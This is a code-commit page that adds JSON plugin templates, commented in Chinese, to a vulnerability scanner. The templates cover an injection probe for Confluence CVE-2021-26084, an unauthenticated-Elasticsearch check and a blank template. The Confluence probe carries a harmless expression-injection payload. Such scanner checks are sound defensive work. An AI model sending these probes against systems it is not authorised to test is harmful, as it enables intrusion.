2.2预览版3新模板

er10yi · Sep 8, 2021 · 1d4fdbb · 1d4fdbb
1 parent 3b13c62
commit 1d4fdbb
Show file tree

Hide file tree

Showing 3 changed files with 65 additions and 0 deletions.
diff --git a/批量导入数据/2.4 web插件/Confluence RCE(CVE-2021-26084).json b/批量导入数据/2.4 web插件/Confluence RCE(CVE-2021-26084).json
@@ -0,0 +1,15 @@
+// 这里是注释，// 开头的那行会被忽略
+// 行尾也可以用 //注释
+{
+    "name": "Confluence RCE(CVE-2021-26084)", //插件名称
+    "risk": "严重", //风险级别
+    "method": "post", //请求方法
+    "url": "/pages/doenterpagevariables.action", //请求url
+    "header": null, //使用[扫描配置-爬虫ua]中的头
+    "body": "queryString=randompppppp\u0027%2b#{3*333}%2b\u0027bbb", // 常规参数
+    "port": null, //没有指定端口
+    "service": "http", //服务
+    "version": null, //没有指定版本
+    "keyword": "randompppppp", //漏洞关键词
+    "vulname": "默认" //对应漏洞wiki中的漏洞
+}
diff --git a/批量导入数据/2.4 web插件/ElasticsearchUnauth.json b/批量导入数据/2.4 web插件/ElasticsearchUnauth.json
@@ -0,0 +1,15 @@
+// 这里是注释，// 开头的那行会被忽略
+// 行尾也可以用 //注释
+{
+    "name": "ElasticsearchUnauth", //插件名称
+    "risk": "高危", //风险级别
+    "method": "get", //请求方法
+    "url": "/_cat", //请求url
+    "header": null, //使用[扫描配置-爬虫ua]中的头
+    "body": null, // 没有参数
+    "port": "9200", //端口
+    "service": "Elasticsearch", //服务
+    "version": null, //没有指定版本
+    "keyword": "/_cat/allocation,/_cat/count", //漏洞关键词
+    "vulname": "默认" //对应漏洞wiki中的漏洞
+}
diff --git a/批量导入数据/2.4 web插件/demo.json b/批量导入数据/2.4 web插件/demo.json
@@ -0,0 +1,35 @@
+// 这里是注释，// 开头的那行会被忽略
+// 单个json格式的web插件
+// 行尾也可以用 //注释
+{
+    //插件名称，不能为空
+    "name": null,
+    //风险级别：信息, 低危, 中危, 高危, 严重, 致命，不能为空
+    "risk": null,
+    //请求方法：不能为空，可以是get、post、put、delete、patch、head、options、trace
+    "method": null,
+    //请求url，不能为空，以/开头，不需要完整的url，完整的url由系统根据端口、服务、版本获取ip端口后，与协议、方法及当前填写的url拼接而成    get带参数写在url里
+    "url": null,
+    //请求头，json格式，如果不指定User-Agent头的值，则会从 [扫描配置-爬虫ua] 中随机一个头
+    "header": null,
+    //请求体，可以是json格式，或者常规参数格式
+    // 1.没有参数
+    "body": null,
+    // 2.json格式参数
+    // "body": {
+    //     "username": "test",
+    //     "password": "passwd"
+    // },
+    // 3.常规参数
+    // "body": "id=1&user=test"
+    //插件对应的端口，可以多个value，英文,逗号分割，资产/目标端口与此相同，才会调用该插件
+    "port": null,
+    //插件对应端口的服务，可以多个value，英文,逗号分割，资产/目标端口的服务包含此服务，则调用该插件
+    "service": null,
+    //插件对应端口服务的版本，可以多个value，英文,逗号分割，资产/目标端口的版本包含此版本，则调用该插件
+    "version": null,
+    //结果中包含该关键词，则存在漏洞；结果包含header和response，可以多个value，英文,逗号分割
+    "keyword": null,
+    //插件对应漏洞wiki中的漏洞，没有则填默认，单个漏洞
+    "vulname": "默认"
+}